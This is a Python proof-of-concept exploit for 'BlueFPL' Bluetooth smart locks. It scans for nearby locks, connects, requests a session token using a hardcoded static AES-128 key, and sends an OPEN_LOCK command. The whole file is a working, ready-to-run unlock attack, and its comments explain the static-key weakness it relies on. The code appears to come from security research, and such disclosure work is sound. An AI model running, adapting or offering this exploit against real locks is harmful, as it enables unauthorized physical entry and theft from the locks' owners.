import binascii

from bluepy.btle import BTLEException, DefaultDelegate, Peripheral, Scanner
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import ECB
# Hex-encoded AES-128 key used by both encrypt() and decrypt(). It is one
# fixed value baked into the client, so whoever holds this script holds the
# key — the weakness this proof of concept relies on.
KEY: str = "241F632E5907042061014C1A3A45193B"
# Rebound by NotifyDelegate.handleNotification to the hex-encoded decrypted
# notification (bytes); done() then slices the session token out of it.
TOKEN = ""
class NotifyDelegate(DefaultDelegate):
    """bluepy delegate that captures the lock's notifications.

    Every notification is run through ``decrypt`` and the hex-encoded
    plaintext is stored in the module-level ``TOKEN``; ``done`` later
    slices the session token out of it.
    """

    def __init__(self, params):
        # ``params`` is accepted only for signature compatibility (the caller
        # passes the Peripheral); the delegate does not use it.
        super().__init__()

    def handleNotification(self, cHandle, data):
        """Decrypt one incoming notification and publish it via ``TOKEN``."""
        global TOKEN
        handle_text = format(cHandle, "02X")
        print("Notification from Handle: 0x" + handle_text)
        TOKEN = decrypt(binascii.hexlify(data))
        print(TOKEN)
def decrypt(plaintext):
    """Decrypt a hex-encoded AES-128-ECB ciphertext under the module ``KEY``.

    Args:
        plaintext: hex string or bytes of the *ciphertext* (the parameter
            name is historical). Its decoded length must be a multiple of
            16 bytes; ``cryptography`` raises ``ValueError`` otherwise.

    Returns:
        The decrypted frame, hex-encoded (``bytes``).

    Raises:
        ValueError: if ``KEY`` does not decode to a 16-byte (AES-128) key.

    ECB provides neither randomisation nor integrity: identical blocks
    decrypt identically and a tampered block decrypts silently to garbage,
    so nothing here authenticates what the lock sent.
    """
    raw_key = binascii.unhexlify(KEY)
    if len(raw_key) != 16:  # only AES-128 is accepted
        raise ValueError("Invalid key size")
    cipher = Cipher(algorithms.AES(raw_key), modes.ECB(), backend=default_backend())
    decryptor = cipher.decryptor()
    ciphertext = binascii.unhexlify(plaintext)
    frame = decryptor.update(ciphertext) + decryptor.finalize()
    return binascii.hexlify(frame)
def encrypt(plaintext):
    """Encrypt a hex-encoded frame with AES-128-ECB under the module ``KEY``.

    Args:
        plaintext: hex string or bytes of the frame to send. No padding is
            applied, so the decoded length must be a multiple of 16 bytes or
            ``cryptography`` raises ``ValueError``.

    Returns:
        Hex-encoded ciphertext (``bytes``).

    ECB is deterministic and unauthenticated: the same command always
    encrypts to the same bytes, so the transport itself offers no replay or
    tamper protection; the GET_TOKEN exchange in ``done`` is the only
    freshness mechanism visible in this script.
    """
    raw_key = binascii.unhexlify(KEY)
    cipher = Cipher(algorithms.AES(raw_key), modes.ECB(), backend=default_backend())
    encryptor = cipher.encryptor()
    frame = binascii.unhexlify(plaintext)
    ciphertext = encryptor.update(frame) + encryptor.finalize()
    return binascii.hexlify(ciphertext)
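def done(addr):
    """Connect to the BlueFPL lock at ``addr``, obtain its token and send OPEN_LOCK.

    Args:
        addr: Bluetooth address string of the advertising lock, as returned
            by the scanner.

    Flow, as visible in the code (every frame is one 16-byte AES-ECB block
    passed through ``encrypt``/``decrypt`` hex-encoded):

    1. connect and attach ``NotifyDelegate``;
    2. locate service ``fee7`` and its TX (``36f5``) / RX (``36f6``)
       characteristics;
    3. enable notifications on RX by writing ``01 00`` to its CCCD
       (descriptor UUID 0x2902);
    4. wait for a notification, then write GET_TOKEN (``06 01 01 01 00 ...``);
    5. take hex chars 6..14 of the decrypted notification as the token and
       write OPEN_LOCK (``05 01 06`` + ASCII ``"000000"`` + token + ``00 00 00``).

    The token is the only per-session value; the AES key is static, and the
    token is returned to whoever sends GET_TOKEN under that key, so the key
    alone is sufficient to open the lock — the weakness this script
    demonstrates.

    Exits with status 1 (via ``exit``) when the connection fails or the
    service / CCCD cannot be found. Side effects: prints progress and
    rebinds the module-level ``TOKEN``.
    """
    global TOKEN
    print("[+]Find BlueFPL")
    print("[+]Try Connecting.....")
    # bluepy reports a failed connection by raising BTLEException rather than
    # returning a falsy object, so the original ``if conn:`` else-branch was
    # unreachable; catch the exception to make the failure path real.
    try:
        conn = Peripheral(addr)
    except BTLEException as err:
        print("[+]Fail to connet")
        print(err)
        exit(1)
    print("[+]Connecting successfully!")
    conn.withDelegate(NotifyDelegate(conn))
    print("[+]Try find fee7")
    svc_uuid = "0000fee7-0000-1000-8000-00805f9b34fb"
    # Same story for an absent service: bluepy raises a BTLEException
    # subclass instead of returning None.
    try:
        svc = conn.getServiceByUUID(svc_uuid)
    except BTLEException as err:
        print("[+]fee7 not found")
        print(err)
        exit(1)
    print("[+]Found fee7!")
    print(svc.uuid)
    # getCharacteristics() returns a list; [0] raises IndexError when the
    # characteristic is missing, which is left as a hard failure.
    TX_CHAR = conn.getCharacteristics(uuid="000036f5-0000-1000-8000-00805f9b34fb")[0]
    RX_CHAR = conn.getCharacteristics(uuid="000036f6-0000-1000-8000-00805f9b34fb")[0]
    print("[+]Try GET_TOKEN")
    pd = "06010101000000000000000000000000"
    hEcg = RX_CHAR.getHandle()
    # Locate the Client Characteristic Configuration descriptor (0x2902) of
    # RX between RX's handle and the end of the service; the last match wins.
    hEcgcc = 0
    for descriptor in conn.getDescriptors(hEcg, svc.hndEnd):
        if descriptor.uuid == 0x2902:
            print("[+]Found descriptor handle")
            hEcgcc = descriptor.handle
    if hEcgcc == 0:
        print("Fail to find descriptor handle")
        exit(1)
    print("[+]Descriptor handle:" + str(hEcgcc))
    # 01 00 = enable notifications.
    conn.writeCharacteristic(hEcgcc, bytes([1, 0]))
    # NOTE(review): the wait happens *before* GET_TOKEN is written, and TOKEN
    # is sliced right after the write without another wait. Whether the token
    # frame arrives on subscription or is dispatched while bluepy waits for
    # the write response is not visible here — confirm against the lock.
    while True:
        if conn.waitForNotifications(1.0):
            break
        print("Wating....")
    TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
    # Hex chars 6..14 = bytes 3..6 of the decrypted notification.
    TOKEN = TOKEN[6:14]
    print(b"[+]TOKEN:" + TOKEN)
    print("[+]Try OPEN_LOCK")
    pd = b"050106303030303030" + TOKEN + b"000000"
    TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
    print("[+]Open successfully!")
    conn.disconnect()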
if __name__ == "__main__":
    # Scan for 3 s and hand every advertiser whose Complete Local Name
    # (AD type 0x09) contains "BlueFPL" to done().
    scanner = Scanner()
    for dev in scanner.scan(timeout=3):
        local_name = dev.getValueText(9)
        if not local_name:
            continue
        if "BlueFPL" in local_name:
            done(dev.addr)